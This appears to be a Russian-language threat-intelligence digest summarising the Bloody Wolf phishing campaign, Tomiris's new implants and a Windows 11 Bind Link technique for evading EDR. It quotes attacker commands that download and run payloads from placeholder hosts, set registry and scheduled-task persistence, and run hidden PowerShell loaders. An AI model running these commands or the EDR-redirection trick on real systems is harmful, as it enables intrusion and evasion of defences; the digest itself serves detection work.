🔻 Bloody Wolf: целевая кампания в Центральной Азии

Bloody Wolf - группа, активная с конца 2023 года. В 2025-м она проводит фишинговые атаки на организации Центральной Азии, используя поддельные документы Минюстов и загрузку легитимного NetSupport RAT через JAR-файлы.

Формат атаки
1) Первичный доступ
Цели: организации Кыргызстана, позднее - Узбекистана (ранее BI.ZONE описывала активность в Казахстане и России).
Атака начинается с фишингового письма с вложенным PDF, стилизованным под документ Министерства юстиции.
В PDF содержатся ссылки вида «материалы дела».
Жертве предлагается установить Java с «официального сайта», якобы необходимую для открытия документов.
2) Загрузка JAR-файла
По ссылке в PDF скачивается вредоносный JAR.
В фазе Узбекистана инфраструктура была геоограниченной:
запросы из-за пределов страны - редирект на легитимный data[.]egov[.]uz;
запросы изнутри страны - автоматическая загрузка JAR.
JAR-файлы компактны, собраны под Java 8, не содержат обфускации и включают один класс.
Основные функции JAR-лоадера:
загрузка компонентов NetSupport Manager по HTTP с встроенного URL;
добавление NetSupport в автозапуск;
создание задания в планировщике;
отображение поддельных сообщений об ошибке, связанных с названием JAR;
ведение счётчика запусков (значение по умолчанию - 3), сохранённого в
%USERPROFILE%\Documents\…\*.dat.
3) Механизмы закрепления (Persistence)
JAR создаёт три отдельных механизма автозапуска NetSupport:
Папка автозагрузки
BAT-файл в:


%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup



запускает основной исполняемый файл.
Раздел HKCU\Run
Пример команды:


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run ^
/v [ключ] /t REG_SZ /d "[путь к EXE]"



Планировщик задач


schtasks /TN "[имя]" /TR "[путь к EXE]" /SC ONLOGON /RL LIMITED /F /RU "%USERNAME%"



Инструменты и инфраструктура
Ранее Bloody Wolf использовала STRRAT, затем перешла на легитимный NetSupport RAT.
В рассматриваемой кампании применяется старая версия NetSupport Manager (2013 года) с лицензиями, найденными в сети.
Group-IB выявила наличие кастомного генератора JAR-файлов: множество вариантов с различными путями установки, ключами реестра, задачами и текстами ошибок.
Конфигурация JAR хранится во внутренних переменных файла.

Артефакты на хосте
Запуск JAR-файлов пользователями.
Наличие файлов:


%USERPROFILE%\Documents\…\*.dat



Появление BAT-файлов в:


%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup


Новые ключи в:


HKCU\Software\Microsoft\Windows\CurrentVersion\Run



с путями к исполняемым файлам в Documents\….
Новые задания планировщика с параметрами ONLOGON, RL LIMITED.
Старые бинарные файлы NetSupport (по хэшам в IoC).
Сетевые индикаторы
HTTP-запросы к доменам:

minjust-kg[.]com

,

esf-kg[.]com

,

audit-kg[.]com

,

ach-uz[.]com

,

uzaudit[.]com

,

soliq-uz[.]com

,

hisobot-uz[.]com

,

ttbbaits[.]com

,

nac-ac[.]com

,

hgame33[.]com

,

ravinads[.]com

.

Поведение геофильтрации:
внешние IP → легитимный data[.]egov[.]uz;
локальные IP → загрузка JAR.

🔗 https://www.group-ib.com/ru/blog/bloody-wolf/
🦔THF

Tomiris new tools

Tomiris перешли на мульти-язычные импланты и массовый уход в публичные C2 (Telegram/Discord). Первичный доступ - фишинг с длинными русскими именами .doc<пробелы>.exe. Дальше - ReverseShell → Havoc/AdaptixC2.

Формат атаки
Фишинг-архив → EXE с маскировкой под документ → reverse shell (C/C++/Rust/Go/Python/PowerShell) → загрузка AdaptixC2/Havoc → дальнейшая эксплуатация.

Новые особенности
C2 через публичные сервисы:
Discord webhooks → Rust Downloader, Python Discord ReverseShell
Telegram bot API → Python Telegram RS, C# Telegram RS, PowerShell Telegram Backdoor
Многоязычные импланты:
C/C++ ReverseShell (несколько вариантов)
Rust Downloader + Rust ReverseShell
Python Discord RS + Python FileGrabber + Python Telegram RS
C# Telegram RS
Go ReverseShell и Go ReverseSocks
PowerShell Telegram Backdoor
Новая цепочка Rust Downloader:
сбор системной информации → отправка на Discord;
поиск файлов → отправка только путей;
дроп VBS+PS1 → цикл загрузки 1.zip → распаковка → запуск всех .exe.
Активное использование open-source фреймворков:
AdaptixC2
Havoc
Dystopia-C2 (в Distopia Backdoor)
ReverseSocks5-форки (C++ и Go)
Повторяющиеся паттерны доставки:
длинные русские названия .exe
файлы в архивах с паролем формата xyz@2025
одинаковые имена → разные импланты внутри

Разведка и базовые команды

echo 4fUPU7tGOJBlT6D1wZTUk
whoami
ipconfig /all
systeminfo
hostname
net user /dom
dir
dir C:\users\[username]

Загрузка последующих стадий

bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe
curl -o $public\libraries\service.exe http://<HOST>/service.exe
certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar

powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe'"

Проверка успешной загрузки

dir $temp
dir $public\libraries

Persistence через реестр

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinUpdate /t REG_SZ /d $public\pictures\winupdate.exe /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Win-NetAlone" /t REG_SZ /d "$public\videos\alone.exe"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Winservice" /t REG_SZ /d "$public\Pictures\dwm.exe"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurrentVersion /t REG_SZ /d $public\Pictures\sbschost.exe /f

Проверка persistence

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Команды Rust Downloader (запуск через cmd.exe)

cmd /C "ipconfig /all"
cmd /C "echo %username%"
cmd /C hostname
cmd /C ver
cmd /C curl hxxps://ipinfo.io/ip
cmd /C curl hxxps://ipinfo.io/country"

Дроп и выполнение VBS/Powershell скриптов
script.vbs:

Set Shell = CreateObject("WScript.Shell")
Shell.Run "powershell -ep Bypass -w hidden -File %temp%\script.ps1"
Часть логики script.ps1 (цикл загрузки ZIP):

Invoke-WebRequest -Uri $Url -UseBasicParsing -ErrorAction Stop
iwr -OutFile $env:Temp\1.zip -Uri $dUrl
tar -xf $env:Temp\1.zip -C $env:Temp\rfolder
Get-ChildItem $env:Temp\rfolder -Filter "*.exe" | ForEach-Object { Start-Process $_.FullName }

Команда загрузки Python FileGrabber

cmd.exe /c "curl -o $public\videos\offel.exe http://<HOST>/offel.exe"

Команды Distopia Backdoor (выполненные оператором)

cmd.exe /c "dir"
cmd.exe /c "dir C:\user\[username]\pictures"
cmd.exe /c "pwd"
cmd.exe /c "curl -O $public\sysmgmt.exe http://<HOST>/private/svchost.exe"
cmd.exe /c "$public\sysmgmt.exe"

PowerShell Telegram Backdoor (вызов дроппера)

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand <Base64>

🔗https://securelist.com/tomiris-new-tools/118143/

Псевдонимы: YoroTrooper | SturgeonPhisher | Silent Lynx | COMRADE SAIGA | Tomiris | ShadowSilk

🦔THF

Bind Link EDR Evasion: Folder Redirection on Windows 11

The Bind Link API enables Administrators to create transparent mappings from a virtual path to a backing path (local or remote). The Bind Link feature was introduced in Windows 11 and according to Microsoft it should be used to improve application compatibility by making files stored in a network share appear as local or in scenarios where an application requires files from a different location to appear in a new location without copying the files. It is possible to abuse the feature of bind links to force the redirection of the folder containing the EDR files to a folder that a threat actor has write access to perform evasion.

Формат атаки
• Windows 11 содержит Bind Link API - механизм прозрачного маппинга виртуального пути к физическому (локальному или сетевому).
• PoC EDR-Redir (TwoSevenOneT) использует драйвер bindflt.sys, чтобы перенаправить каталог EDR в директорию с правом записи.
• В результате создаётся «зеркало» EDR-папки, где можно менять файлы, удалять их, внедрять DLL или подставлять бинарь, который затем выполняется в контексте EDR.

• Bind Link позволяет создать новую «родительскую» директорию для EDR, что визуально маскирует подмену.
• Перенаправление каталогов создаёт копию структуры EDR в backing-папке (например, C:\temp\ipurple).
• Злоумышленник может загрузить вредоносную DLL, имитирующую легитимный модуль EDR, для persistence / hijacking.

• PoC использует стандартные API:
CreateDirectoryW — создание прокси-папок,
LoadLibraryW — загрузка bindfltapi.dll,
Вызовы BfSetupFilter / BfRemoveMapping — создание/удаление bind links.

Detection
The technique of the folder redirection relies on the Bind Link API. Therefore, it is recommended to investigate if the implementation of the EDR supports monitoring of the

bindflt

driver that is used to perform the directory mapping. Alternatively, organizations should assess whether it is feasible to deploy Sysmon to enhance visibility about image load events. Correlation should be also used to validate if there are valid use cases in their environment that utilise the bindfltapi.dll to reduce the noise.

Посмотрим будет ли использовать такую фичу APT😃

🔗 https://ipurple.team/2025/12/01/bind-link-edr-tampering/
🦔THF